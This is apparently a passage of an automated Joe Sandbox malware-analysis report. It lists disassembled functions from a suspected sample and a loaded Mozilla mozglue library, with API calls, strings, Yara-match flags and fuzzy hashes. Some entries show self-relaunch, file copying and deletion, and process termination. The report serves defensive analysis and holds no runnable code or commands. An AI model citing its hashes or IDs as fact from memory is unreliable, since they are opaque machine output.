Uniqueness Score: -1.00%

Function 6BBD9B50 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

??KDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6BBD9B74
?ceil@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6BBD9BBA
?floor@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6BBD9BC8
??DDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6BBD9BD7
??GDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?,?,?), ref: 6BBD9BE0

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Decimal@blink@@$V01@V01@@$V12@$?ceil@?floor@
String ID:
API String ID: 2380687156-0
Opcode ID: 46fbf6d5696c148b502540aa13a5a206b6e96e28453bd6f8d09125bd31a6314a
Instruction ID: 1f946146149ca0cc9b82f6679e75cdeba7f4e4d2715da12d8e93dcca8f643e3f
Opcode Fuzzy Hash: 46fbf6d5696c148b502540aa13a5a206b6e96e28453bd6f8d09125bd31a6314a
Instruction Fuzzy Hash: BB118232918788ABC710AF788C518AFB7B8FFC6364F005A1DF99947141EB39D544C792

Uniqueness

Uniqueness Score: -1.00%

Function 004185A7 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004185B3

Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C

__getptd.LIBCMT ref: 004185CA
__amsg_exit.LIBCMT ref: 004185D8
__lock.LIBCMT ref: 004185E8
__updatetlocinfoEx_nolock.LIBCMT ref: 004185FC

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
Instruction ID: cdd0eec35e4bf80da2317afb9b55000317a90f0185e5a3c9ee5e330d7cc08b67
Opcode Fuzzy Hash: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
Instruction Fuzzy Hash: A4F09632A49710AAD721BBBA9C027CA77B1AF00739F10411FF505A62D2CF6C69C1CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 004132F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00413323

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

ShellExecuteEx.SHELL32(0000003C), ref: 004133E6
ExitProcess.KERNEL32 ref: 00413415

Strings

<, xrefs: 00413399

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 1d4a81d81af302f4c74476254500e49e01b298110368202476dc48bc5823cd56
Instruction ID: 9270ca21e45796c21bf284f368f95b7d0dbf71ea93a5a7258f1c6a627d8bac6b
Opcode Fuzzy Hash: 1d4a81d81af302f4c74476254500e49e01b298110368202476dc48bc5823cd56
Instruction Fuzzy Hash: 383144B19012189BDB14EB91DD91FDDBB78AF48304F80518DF20566191DF746B89CF9C

Uniqueness

Uniqueness Score: -1.00%

Function 6BB7F100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32,?,6BBED020), ref: 6BB7F122
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6BB7F132

Strings

shell32, xrefs: 6BB7F11D
SHGetKnownFolderPath, xrefs: 6BB7F12C

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetKnownFolderPath$shell32
API String ID: 2574300362-1045111711
Opcode ID: 258b5372f9d38ee9f00e6975a0e0deb990a157a33d3be97139b3867c6ba2b691
Instruction ID: 3d39b7f68d9104b723d673e54171843c39c32919ce43eeb093b470210598bf13
Opcode Fuzzy Hash: 258b5372f9d38ee9f00e6975a0e0deb990a157a33d3be97139b3867c6ba2b691
Instruction Fuzzy Hash: B3015E75A002599FCF109F79EC58A6B7BFCEF4A654B400428E959D7200D735EA04CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00415450 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
wsprintfW.USER32 ref: 00415478

Strings

%hs, xrefs: 0041546F

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
Instruction ID: 2a04a3b42468460cff415e79ad4cc7303691da2b1e165ac812b33aed5ccf4e4e
Opcode Fuzzy Hash: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
Instruction Fuzzy Hash: A5E0ECB5A40608BFDB20DFD4ED0AEAD77A9EB48701F100194F90AD7640DA719E109B95

Uniqueness

Uniqueness Score: -1.00%

Function 6BBACBE8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,6BB731A7), ref: 6BBACBF1
TerminateProcess.KERNEL32(00000000,00000003,?,6BB731A7), ref: 6BBACBFA

Strings

: (malloc) Error in VirtualFree(), xrefs: 6BBAD001
<jemalloc>, xrefs: 6BBACFFC

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Process$CurrentTerminate
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2429186680-2186867486
Opcode ID: 79a2e9edb079ce9887075417cc3519c60eee98b1a92645b588b7491de5e940f5
Instruction ID: 14fa30e58e0d702ed9650f9e5fcca6b6d9b321136bd3f0e2ad56c720f391968c
Opcode Fuzzy Hash: 79a2e9edb079ce9887075417cc3519c60eee98b1a92645b588b7491de5e940f5
Instruction Fuzzy Hash: 15B092704043089BDB242BA4A80DB293B6DB709A01F000828A20183241CBBAE1008E61

Uniqueness

Uniqueness Score: -1.00%

Function 6BB82272 Relevance: 6.6, APIs: 5, Instructions: 360COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6BB8237F
memcpy.VCRUNTIME140(?,?,00010000), ref: 6BB82B9C

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 8485c6bc3ae5fa0b32f02e2ce96a59c3aa479f00fc9050786ed041f24e32b4ff
Instruction ID: e1a4303cec3bbe63d0d0669984c2dd78cb37ec08a2b16d4564955286c65d7b4d
Opcode Fuzzy Hash: 8485c6bc3ae5fa0b32f02e2ce96a59c3aa479f00fc9050786ed041f24e32b4ff
Instruction Fuzzy Hash: 67E17D71A002459FDB18CF69C8D0A9EBBB2FF88314F1981ADE9099B345D775EC85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6BBC9120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6BBC8242,?,00000000,?,6BBBB63F), ref: 6BBC9188
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6BBC8242,?,00000000,?,6BBBB63F), ref: 6BBC91BB
memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6BBC8242,?,00000000,?,6BBBB63F), ref: 6BBC91EB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6BBC8242,?,00000000,?,6BBBB63F), ref: 6BBC9200
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6BBC8242,?,00000000,?,6BBBB63F), ref: 6BBC9219

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: f77fbe491ff5012eb2fdee68bdcb5d969f640853d596d5f8f2991faa05b2fe03
Instruction ID: c4e56332135a9d463fb6cab3aa2c50a42ddd5a183b7fdb3b539fd6857803e871
Opcode Fuzzy Hash: f77fbe491ff5012eb2fdee68bdcb5d969f640853d596d5f8f2991faa05b2fe03
Instruction Fuzzy Hash: C5310031A00A458FFB01CF78DC4576BB3A9FF81209F414669D89ADB241EB35E845CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB50 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,042F7D68,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CBD1
lstrlen.KERNEL32(00000000), ref: 0040CDE8
lstrlen.KERNEL32(00000000), ref: 0040CDFC
DeleteFileA.KERNEL32(00000000), ref: 0040CE75

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: ce59c37605846a703ec7f329bf693d0e3fd4ec37542f7efc21b4330092dfbd7f
Instruction ID: 6e212494759c8e3b152de70cf12e9653d7fde48daaab02ad2b76da051d612c4f
Opcode Fuzzy Hash: ce59c37605846a703ec7f329bf693d0e3fd4ec37542f7efc21b4330092dfbd7f
Instruction Fuzzy Hash: 1B914A729102049BCB14FBA1DC51EEE7739BF14304F51425EF51676491EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 6BBD7170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6BBD7250
EnterCriticalSection.KERNEL32(6BBFF688), ref: 6BBD7277
__aulldiv.LIBCMT ref: 6BBD72C4
LeaveCriticalSection.KERNEL32(6BBFF688), ref: 6BBD72F7

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 91e66e7386ca52eb2e3cfd1186aa2851b632f09a2944efe8d2b9d33f87217986
Instruction ID: 283c3ecbfebf98a1751a72a0b231d7e38cc9f16233cb7b46890eeb7e8cd899d5
Opcode Fuzzy Hash: 91e66e7386ca52eb2e3cfd1186aa2851b632f09a2944efe8d2b9d33f87217986
Instruction Fuzzy Hash: 59519F71E011699FCF08CFA9C890ABEBBB6FB89300F15862DD815A7350CB75A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6BBBE390 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BBBE3E4
AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBE3F1
memset.VCRUNTIME140(?,00000000,?), ref: 6BBBE4AB

Part of subcall function 6BB85D40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,?,6BBBD2DA,00000001), ref: 6BB85D66

ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBE4F5
GetCurrentThreadId.KERNEL32 ref: 6BBBE577
AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBE584
ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBE5DE
memset.VCRUNTIME140(?,00000000,00000000), ref: 6BBBE6DA
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BBBE864
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BBBE883
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6BBBE8A6

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6BBBE826, 6BBBE850
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6BBBE777
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6BBBE722, 6BBBE750, 6BBBE7A2
MOZ_PROFILER_STARTUP, xrefs: 6BBBE5A1, 6BBBE5CC, 6BBBE5FF, 6BBBE62A
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6BBBE655

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreememset$Xbad_function_call@std@@malloc
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 905598890-53385798
Opcode ID: 7c5ecb92c803cf81561f219cebbe08c7965f4949ad302c53f1859d14e2ad35ff
Instruction ID: 01aae91ff1080e2d45a043b08d38100b2927ece5c41df95f29164f900b692103
Opcode Fuzzy Hash: 7c5ecb92c803cf81561f219cebbe08c7965f4949ad302c53f1859d14e2ad35ff
Instruction Fuzzy Hash: 22419A74A0064ACFDB18CF28C490ABEB7B5FF4A304F0045ADD91A9B791DB79E855CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6BBCDAE0 Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6BBCDB86
??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6BBCDC0E
free.MOZGLUE(?), ref: 6BBCDC2E
free.MOZGLUE(?), ref: 6BBCDC40

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Impl@detail@mozilla@@Mutexfree
String ID:
API String ID: 3186548839-0
Opcode ID: 7cf3aeb40cd593aaa6743f5f16bb244a6a1830099721856558b1ea4cd3a5eeff
Instruction ID: c953a429e425de60b91e99681e732998210dbfdee774786e464f23b988610587
Opcode Fuzzy Hash: 7cf3aeb40cd593aaa6743f5f16bb244a6a1830099721856558b1ea4cd3a5eeff
Instruction Fuzzy Hash: B54144796447408FC710CF34C498A6FBBF6EF88254F55886DE89A87351EB39E844CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6BBCA2B0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6BBCA315
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6BBCA31F
free.MOZGLUE(00000000,?,?,?,?), ref: 6BBCA36A

Part of subcall function 6BB95E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BB95EDB
Part of subcall function 6BB95E90: memset.VCRUNTIME140(6BBD7765,000000E5,55CCCCCC), ref: 6BB95F27
Part of subcall function 6BB95E90: LeaveCriticalSection.KERNEL32(?), ref: 6BB95FB2

Part of subcall function 6BBC2140: free.MOZGLUE(?,00000060,?,6BBC7D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BBC215D

free.MOZGLUE(00000000), ref: 6BBCA37C

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
String ID:
API String ID: 700533648-0
Opcode ID: da0396f2ab992e408aeb474f526704f47d2d775635b82d941f053639867550e4
Instruction ID: d75bd057d7344285a7ae5b4c227963e79acbe6596bbf91c110713f6fcae3c3bd
Opcode Fuzzy Hash: da0396f2ab992e408aeb474f526704f47d2d775635b82d941f053639867550e4
Instruction Fuzzy Hash: B0210471A006649FCB01DF19D810B5FBBA8EF86754F054065EE099B301DB3AED02CAD7

Uniqueness

Uniqueness Score: -1.00%

Function 00415BD0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00415BEB

Part of subcall function 00415450: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
Part of subcall function 00415450: HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
Part of subcall function 00415450: wsprintfW.USER32 ref: 00415478

OpenProcess.KERNEL32(00001001,00000000,?), ref: 00415CAB
TerminateProcess.KERNEL32(00000000,00000000), ref: 00415CC9
CloseHandle.KERNEL32(00000000), ref: 00415CD6

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 396451647-0
Opcode ID: fdfea1e36e01ba5dc6c08a707d84f87bfe87981db8c2dab46dee4399722e953d
Instruction ID: 9bd26bda15b00488fb04890a05ea267a73874a1d1a12279ce6d54c29d70e7cb6
Opcode Fuzzy Hash: fdfea1e36e01ba5dc6c08a707d84f87bfe87981db8c2dab46dee4399722e953d
Instruction Fuzzy Hash: B7311E71A00708DFDB24DFD0CD49BEDB775BB88304F204459E506AA284EB78AA85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 6BB95B50 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,6BB956EE,?,00000001), ref: 6BB95B85
EnterCriticalSection.KERNEL32(6BBFF688,?,?,?,6BB956EE,?,00000001), ref: 6BB95B90
LeaveCriticalSection.KERNEL32(6BBFF688,?,?,?,6BB956EE,?,00000001), ref: 6BB95BD8
GetTickCount64.KERNEL32 ref: 6BB95BE4

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: CriticalSection$Count64CounterEnterLeavePerformanceQueryTick
String ID:
API String ID: 2796706680-0
Opcode ID: 86e0900d66262c929458b4634007cc55f6454f211a452e27090c236696eece70
Instruction ID: 725dcc7e93b41456e0c98fa6cf2da3bcf5083c5ff22d6a24fbb236152341cef6
Opcode Fuzzy Hash: 86e0900d66262c929458b4634007cc55f6454f211a452e27090c236696eece70
Instruction Fuzzy Hash: 012191756057449FCB08DF68E45566EBBEAEF8E310F04C82EE99A87390DB71E804CB41

Uniqueness

Uniqueness Score: -1.00%

Function 6BBC1B80 Relevance: 6.1, APIs: 4, Instructions: 77threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BBC1B98
AcquireSRWLockExclusive.KERNEL32(?,?,6BBC1D96,00000000), ref: 6BBC1BA1
ReleaseSRWLockExclusive.KERNEL32(?,?,6BBC1D96,00000000), ref: 6BBC1BB5
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BBC1C25

Part of subcall function 6BBC1C60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,6BBC759E,?,?), ref: 6BBC1CB4

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_free
String ID:
API String ID: 3699359333-0
